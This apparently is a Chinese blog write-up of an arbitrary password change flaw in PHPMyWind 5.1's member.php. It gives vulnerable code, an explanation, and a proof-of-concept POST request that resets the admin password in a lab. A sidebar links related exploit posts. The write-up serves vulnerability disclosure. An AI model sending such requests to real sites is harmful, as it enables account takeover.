httpmember.php,PHPMyWind 5.1 /member.php 远程密码修改漏洞

最新推荐文章于 2022-08-26 00:53:42 发布
最新推荐文章于 2022-08-26 00:53:42 发布
阅读量638 收藏
点赞数
文章标签: httpmember.php
  • /member.php
//初始化参数

……

$id = isset($id) ? intval($id) : 0;

……

//更新资料

else if($a == 'saveedit')

{

//检测数据完整性

if($password!=$repassword or $email=='')

{

header('location:?c=edit');

exit();

}

//HTML转义变量

....

//检测旧密码是否正确

if($password != '')

{

$oldpassword = md5(md5($oldpassword));

$r = $dosql->GetOne("SELECT `password` FROM `#@__member` WHERE `username`='$c_uname'");

if($r['password'] != $oldpassword)

{

ShowMsg('抱歉,旧密码错误!','-1');

exit();

}

}

$sql = "UPDATE `#@__member` SET ";

if($password != '')

{

$password = md5(md5($password));

$sql .= "password='$password', ";

}

@$sql .= "question='$question', answer='$answer', cnname='$cnname', enname='$enname', sex='$sex', birthtype='$birthtype', birth_year='$birth_year', birth_month='$birth_month', birth_day='$birth_day', astro='$astro', bloodtype='$bloodtype', trade='$trade', live_prov='$live_prov', live_city='$live_city', live_country='$live_country', home_prov='$home_prov', home_city='$home_city', home_country='$home_country', cardtype='$cardtype', cardnum='$cardnum', intro='$intro', email='$email', qqnum='$qqnum', mobile='$mobile', telephone='$telephone', address_prov='$address_prov', address_city='$address_city', address_country='$address_country', address='$address', zipcode='$zipcode' WHERE id=$id";

if($dosql->ExecNoneQuery($sql))

{

ShowMsg('资料更新成功!','?c=edit');

exit();

}

}

此处$id为用户传入的id,在修改密码的时候未验证id是否为用户本身,造成可以修改任意用户的资料以及密码。

注册用户,密码为123123,登录。

发送数据包到:

http://10.211.55.3/phpmywind/member.php?e=saveedit

内容为:

oldpassword=123123&password=123123&repassword=123123&email=123%40asd.com&action=update&id=1

id为管理员的id,提示修改成功。 

F239CB78-0D1E-48D6-BA41-E149C00F8F14.png

用123123登录admin帐号。

1D1559B5-EA63-4E44-93F7-7B1CACF21C0E.png

loading-bars.svg

Hi纪
关注
phpmywind最新版sql注入以及后台目录遍历和文件读取
dengzhasong7076的博客
06-17 1184
最新版本 5.3 看wooyun厂商这忽略的架势就觉得是有点放弃治疗的想法啊。 前台会员注入 分析 http://www.wooyun.org/bugs/wooyun-2015-0117008 我看了一下最新版还有这个注入,而作者给的exp有坑处。 这是一个完善账号的功能,在核心文件里面,这个程序用了伪全局,也就导致可以给未初始化的变量赋值。 member.php文件 if(empty(...
社工资源整理
热门推荐
weixin_30865427的博客
07-16 1万+
CMS 1 Tncms 2 Discuz-6 3 phpvod 4 Website Creator 5 微信达微信数字投票管理系统 6 Stackla Social Hub 7 Banshee 8 mymps 9 Kolibri CMS 10 AnanyooCMS 11 ILAS网上图书馆 12 Destoon ...
[【原创】] phpmywind多个鸡肋漏洞1
08-08
>$keyword 木有进行过滤 导致注入 直接访问 木有找到GetPage函数导致出错 注入变成鸡肋下载 (19.21 KB)2012-8-24 13:40后
SCANV团队提醒警惕phpMyWind漏洞“三弹连发”
u013102998的专栏
01-15 1023
继1月3日预警的"phpMyWind高危SQL注入漏洞"及1月7日发布的"phpMyWind再爆高危SQL注入漏洞",0day5网站上再次曝光了一个phpMyWind的高危SQL注入漏洞。该漏洞同1月3日预警漏洞一样存在于shoppingcart.php文件里,影响到官方新版本(v4.6.6 Beta)及1月3日我们发布漏洞补丁(shoppingcart.php文件)。由于这三个漏洞官方暂时都没有
XSS漏洞利用---PHPMyWind 任意密码重置漏洞
xy_sugar的博客
04-15 2798
漏洞详情】 1、PHPMyWind是一套基于PHP和MySQL并符合W3C标准的企业网站建设解决方案,拥有着较大的用户群体(根据PHPMyWind官网介绍,已下载超15万次),受影响的版本是5.3-5.5版本。该“任意密码重置漏洞”联合利用了“反射型XSS漏洞”与“逻辑漏洞”。攻击者可以利用该“反射型XSS漏洞”,通过诱使受害者点击恶意链接,窃取受害者的Cookie;接着,攻击者可以利用Coo...
PhpMyWind 储存型 XSS 漏洞(CVE-2017-12984)
CuiXY's Blog
01-20 393
0x01 介绍 又是一款开源CMS内容管理系统PhpMyWind,在小于等于5.4版本中存在储存型XSS漏洞。如下图所示,这个就是发生储存型XSS漏洞的代码 0x02 演示 1.第一张图是客户留言时,对留言的内容进行htmlspecialchars函数过滤。第二张图是管理员在修改留言信息时并未对显示的内容进行过滤,所以导致了XSS攻击 2.首先进入客户留言板块,在内容处构造我们的POC,验证X...
php+sha512+漏洞,PhpMyWind最新版本注入+后台getshell
weixin_35338620的博客
03-25 1158
转自http://wooyun.org/bugs/wooyun-2010-051256洞主文中没说清楚,厂商也忽略了。简要分析如下漏洞出在/order.php中[php]function GetTopType($tbname='', $tbname2='', $colname='', $id=0, $i=0){global $dosql;if(isset($_GET['id'])){$r = $d...
PHPMyWind网站系统 CMS v5.1
04-03
PHPMyWind v5.1 Beta 更新时间:2014-08-12 更新说明: 【更新】 1.全新视觉,更快、更舒适、更轻量 2.新增管理列表页快捷工具栏 3.新增管理组默认进入站点 4.新增自定义模型预定字段 【优化】 1.优化自定义字段...
phpmywind表结构.pdf
08-03
### 知识点一:PHPMyWind 数据库表结构概览 #### 1. `#@__admanage` 表 - **表结构说明**: - `id`:信息ID,自增,主键。 - `classid`:投放范围(即广告位ID)。 - `parentid`:所属广告位的父ID。 - `...
[代码审计]:PhpMyWind储存型XSS漏洞(CVE-2017-12984)
笑花大王
02-11 659
简介 今天开启一下代码审计的篇章 python安全编程剩下的看起来没意思就结束了 ,现在规划每2周写一个爬虫练练手, 然后今天开启代码审计和Docker的学习 我个人感觉先看漏洞利用过程再看漏洞分析比较好点 phpmywind 5.3 漏洞影响版本:phpMyWind version <= 5.4 测试版本:phpMyWind 5.3 下载地址:链接:https://pan.b...
猜测 member.php,PHPMPS v2.3 /member.php SQL注入漏洞
weixin_30301989的博客
03-10 382
/member.phpcase 'send':$paycenter = trim($_POST['paycenter']);$contactname = trim($_POST['contactname']);$telephone = trim($_POST['telephone']);$email = trim($_POST['email']);$username = trim($_POST['...
PhpMyWind储存型XSS漏洞练习(CVE-2017-12984)
墨鱼菜鸡
01-20 158
0x01 介绍 又是一款开源CMS内容管理系统PhpMyWind,在小于等于5.4版本中存在储存型XSS漏洞。如下图所示,这个就是发...
PHPMyWind用户留言板XSS漏洞
include_heqile的博客
04-22 1690
首先我们来介绍一下DOM中的几个方法 createElement(name) name参数用来规定此元素节点的名称 此方法会返回一个Element节点,具有指定的标签名name appendChild()方法 该方法会返回被添加的节点 可以看一下这段代码实例: &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;bod...
holdpwd php,PHPMyWind后台管理界面的SQL注入漏洞 - 网站安全
weixin_35757191的博客
04-10 601
后台管理界面因为过滤不严格导致SQL注入漏洞,可以使权限较低的管理员取得较高权限,以及获取并修改超级管理员的用户名密码。存在问题的代码,admin_save.php 59-101行,SQL语句中的$id存在注入else if($action == 'update'){//创始人账号不允许更改状态if($id == 1 and ($checkadmin != 'true' or $levelname...
PHPMyWind后台登录密码忘记的解决办法
weixin_30824277的博客
04-25 949
登陆数据库 mysql -u root -p ******** mysql> show databases; mysql>use mysql;(mysql为你的数据库) mysql> show tables;(列出所有表) mysql> select * from ***_admin; mysql>update***_admin set passw...
zzcms8.2任意用户修改密码漏洞
Snowflake1997的博客
03-03 404
1.在登录界面点击密码找回。 2.输入用户名以及验证码 进入安全验证界面时,打开burpsuite进行抓包,点击获取验证码 3.验证码为1151 4.输入后进入设置新密码
我是如何通过变量覆盖挖到PHPMyWind前台RCE(CNVD-2022-24937 )
Askshhbs的博客
04-20 1396
0x01 前言 为什么写这篇文章,又为什么挖掘到这个CMS的漏洞,其实也是有一些原因的。 最近在给学员做培训,备课到变量覆盖的时候没有什么特别好的例子,随后就想到之前有审计一个CMS叫PHPMyWind,随后我download下来了v5.6.beta版本。 该漏洞已经提交至CNVD,并评分为10.0漏洞评分,如图: 0x02 变量覆盖点 因为在之前我是挖掘过这个CMS的,当时是一个后台的任意文件删除,今天的话算是跟老朋友打交道了,我们看一下咱们变量覆盖点,如图: 这里我们可以看到,存..
PHP代码审计5—XSS漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-26 1065
简单的XSS学习
渗透测试-getshell学习总结
lza20001103的博客
08-26 2826
getshell学习总结 文章目录getshell学习总结一、方法分类1.带有漏洞的应用2.常规漏洞3.后台拿shell二、网站常见getshell方法1.数据库备份拿shell2.上传3.修改允许上传类型4.服务器解析漏洞5.编辑器6. 网站配置插马7.上传插件8.数据库执行9.文件包含10. 命令执行三、常见cms后台拿shell1.dedecms一、后台文件上传二、数据库执行拿shell2.南方数据、良精、动易一、数据库备份(备份图片马、备份数据库)1.上传图片马2.审查元素,找到图片马路径3.开始备
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值